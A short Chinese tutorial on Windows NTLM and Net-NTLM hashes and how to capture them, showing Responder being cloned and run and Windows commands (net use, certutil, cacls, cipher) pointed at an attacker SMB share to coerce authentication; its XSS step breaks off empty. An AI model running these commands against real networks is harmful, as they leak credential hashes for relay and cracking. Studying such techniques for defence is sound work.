Net-NTLM hash利用方法

一、windows的hash

NTLM hash

NTLM hash是windows登录密码的一种hash,可以在Windows系统的SAM文件或者域控的NTDS.dit文件中提取到,NTLM hash支持哈希传递攻击。

Net-NTLM hash

Net-NTLM hash是网络环境下NTLM认证的hash,该hash不能进行哈希传递,但是可以用于ntlm中继攻击。

二、如何获取Net-NTLM hash?

使用Responder进行中间人攻击,从而获取Net-NTLM hash。

root@kali:~# git clone https://github.com/lgandx/Responder.git
root@kali:~# cd Responder/
root@kali:~/Responder# ./Responder.py -I eth0 -rv

1.cmd命令

net use \\192.168.80.130\aaa
certutil.exe \\192.168.80.130\aaa
cacls.exe \\192.168.80.130\aaa
cipher.exe \\192.168.80.130\aaa
......
  1. xss
    使用带src的标签


                    
                    

你可能感兴趣的:(Net-NTLM hash利用方法)